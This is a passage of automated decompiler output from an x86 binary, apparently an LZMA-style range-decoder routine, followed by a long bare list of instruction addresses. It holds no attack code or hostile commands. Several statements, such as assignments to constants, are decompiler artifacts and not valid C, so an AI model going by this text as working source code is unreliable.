                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t484 = __ebp - 0x70;
                                                                                            											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t484;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L148:
                                                                                            											_t487 = __ebp - 0x48;
                                                                                            											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                            											__eflags =  *_t487;
                                                                                            											goto L149;
                                                                                            										case 0x19:
                                                                                            											__eflags = __ebx - 4;
                                                                                            											if(__ebx < 4) {
                                                                                            												 *(__ebp - 0x2c) = __ebx;
                                                                                            												L120:
                                                                                            												_t394 = __ebp - 0x2c;
                                                                                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                            												__eflags =  *_t394;
                                                                                            												L121:
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax;
                                                                                            												if(__eax == 0) {
                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                            													goto L170;
                                                                                            												}
                                                                                            												__eflags = __eax -  *(__ebp - 0x60);
                                                                                            												if(__eax >  *(__ebp - 0x60)) {
                                                                                            													goto L171;
                                                                                            												}
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                            												_t401 = __ebp - 0x60;
                                                                                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                            												__eflags =  *_t401;
                                                                                            												goto L124;
                                                                                            											}
                                                                                            											__ecx = __ebx;
                                                                                            											__eax = __ebx;
                                                                                            											__ecx = __ebx >> 1;
                                                                                            											__eax = __ebx & 0x00000001;
                                                                                            											__ecx = (__ebx >> 1) - 1;
                                                                                            											__al = __al | 0x00000002;
                                                                                            											__eax = (__ebx & 0x00000001) << __cl;
                                                                                            											__eflags = __ebx - 0xe;
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											if(__ebx >= 0xe) {
                                                                                            												__ebx = 0;
                                                                                            												 *(__ebp - 0x48) = __ecx;
                                                                                            												L103:
                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                            													__eax = __eax + __ebx;
                                                                                            													 *(__ebp - 0x40) = 4;
                                                                                            													 *(__ebp - 0x2c) = __eax;
                                                                                            													__eax =  *(__ebp - 4);
                                                                                            													__eax =  *(__ebp - 4) + 0x644;
                                                                                            													__eflags = __eax;
                                                                                            													L109:
                                                                                            													__ebx = 0;
                                                                                            													 *(__ebp - 0x58) = __eax;
                                                                                            													 *(__ebp - 0x50) = 1;
                                                                                            													 *(__ebp - 0x44) = 0;
                                                                                            													 *(__ebp - 0x48) = 0;
                                                                                            													L113:
                                                                                            													__eax =  *(__ebp - 0x40);
                                                                                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                            														_t392 = __ebp - 0x2c;
                                                                                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                                                                            														__eflags =  *_t392;
                                                                                            														goto L120;
                                                                                            													}
                                                                                            													__eax =  *(__ebp - 0x50);
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                            													__esi = __edi + __eax;
                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                            													__ax =  *__esi;
                                                                                            													__ecx = __ax & 0x0000ffff;
                                                                                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                            													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                            													if( *(__ebp - 0xc) >= __edx) {
                                                                                            														__ecx = 0;
                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                            														__ecx = 1;
                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                            														__ebx = 1;
                                                                                            														__ecx =  *(__ebp - 0x48);
                                                                                            														__ebx = 1 << __cl;
                                                                                            														__ecx = 1 << __cl;
                                                                                            														__ebx =  *(__ebp - 0x44);
                                                                                            														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                            														__cx = __ax;
                                                                                            														__cx = __ax >> 5;
                                                                                            														__eax = __eax - __ecx;
                                                                                            														__edi = __edi + 1;
                                                                                            														__eflags = __edi;
                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                            														 *__esi = __ax;
                                                                                            														 *(__ebp - 0x50) = __edi;
                                                                                            													} else {
                                                                                            														 *(__ebp - 0x10) = __edx;
                                                                                            														0x800 = 0x800 - __ecx;
                                                                                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            														 *__esi = __dx;
                                                                                            													}
                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            														L112:
                                                                                            														_t369 = __ebp - 0x48;
                                                                                            														 *_t369 =  *(__ebp - 0x48) + 1;
                                                                                            														__eflags =  *_t369;
                                                                                            														goto L113;
                                                                                            													} else {
                                                                                            														goto L110;
                                                                                            													}
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 0xc);
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                            													__ebx = __ebx | 0x00000001;
                                                                                            													__eflags = __ebx;
                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													L102:
                                                                                            													_t339 = __ebp - 0x48;
                                                                                            													 *_t339 =  *(__ebp - 0x48) - 1;
                                                                                            													__eflags =  *_t339;
                                                                                            													goto L103;
                                                                                            												} else {
                                                                                            													goto L100;
                                                                                            												}
                                                                                            											}
                                                                                            											__edx =  *(__ebp - 4);
                                                                                            											__eax = __eax - __ebx;
                                                                                            											 *(__ebp - 0x40) = __ecx;
                                                                                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                            											goto L109;
                                                                                            										case 0x1a:
                                                                                            											L56:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x1a;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x68);
                                                                                            											__al =  *(__ebp - 0x5c);
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            											 *( *(__ebp - 0x68)) = __al;
                                                                                            											__ecx =  *(__ebp - 0x14);
                                                                                            											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            											__eax = __ecx + 1;
                                                                                            											__edx = 0;
                                                                                            											_t192 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t192;
                                                                                            											goto L80;
                                                                                            										case 0x1b:
                                                                                            											L76:
                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                            												__eflags = __eax;
                                                                                            											}
                                                                                            											__edx =  *(__ebp - 8);
                                                                                            											__cl =  *(__eax + __edx);
                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                            											 *(__eax + __edx) = __cl;
                                                                                            											__eax = __eax + 1;
                                                                                            											__edx = 0;
                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                            											__edx = _t275;
                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            											_t284 = __ebp - 0x64;
                                                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                            											__eflags =  *_t284;
                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                            											L80:
                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                            											goto L81;
                                                                                            										case 0x1c:
                                                                                            											while(1) {
                                                                                            												L124:
                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                            													break;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__edx =  *(__ebp - 8);
                                                                                            												__cl =  *(__eax + __edx);
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                            												 *(__eax + __edx) = __cl;
                                                                                            												__eax = __eax + 1;
                                                                                            												__edx = 0;
                                                                                            												_t415 = __eax %  *(__ebp - 0x74);
                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                            												__edx = _t415;
                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                            												 *(__ebp - 0x14) = _t415;
                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													L81:
                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                            													goto L1;
                                                                                            												}
                                                                                            											}
                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                            											L170:
                                                                                            											_push(0x22);
                                                                                            											_pop(_t567);
                                                                                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                            											_t535 = 0;
                                                                                            											L172:
                                                                                            											return _t535;
                                                                                            									}
                                                                                            								}
                                                                                            								L171:
                                                                                            								_t535 = _t534 | 0xffffffff;
                                                                                            								goto L172;
                                                                                            							}
                                                                                            						}
                                                                                            						__eax =  *(__ebp - 0x50);
                                                                                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                            						__eax =  *(__ebp - 0x58);
                                                                                            						__esi = __edx + __eax;
                                                                                            						 *(__ebp - 0x54) = __esi;
                                                                                            						__ax =  *__esi;
                                                                                            						__edi = __ax & 0x0000ffff;
                                                                                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            						if( *(__ebp - 0xc) >= __ecx) {
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            							__cx = __ax;
                                                                                            							__cx = __ax >> 5;
                                                                                            							__eax = __eax - __ecx;
                                                                                            							__edx = __edx + 1;
                                                                                            							 *__esi = __ax;
                                                                                            							 *(__ebp - 0x50) = __edx;
                                                                                            						} else {
                                                                                            							 *(__ebp - 0x10) = __ecx;
                                                                                            							0x800 = 0x800 - __edi;
                                                                                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                            							 *__esi = __cx;
                                                                                            						}
                                                                                            						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            							goto L148;
                                                                                            						} else {
                                                                                            							goto L146;
                                                                                            						}
                                                                                            					}
                                                                                            					goto L1;
                                                                                            				}
                                                                                            			}








                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x00000000
                                                                                            0x00406688
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x00000000
                                                                                            0x004068bc
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x00000000
                                                                                            0x004060d9
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x00000000
                                                                                            0x00406424
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00000000
                                                                                            0x0040676f
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
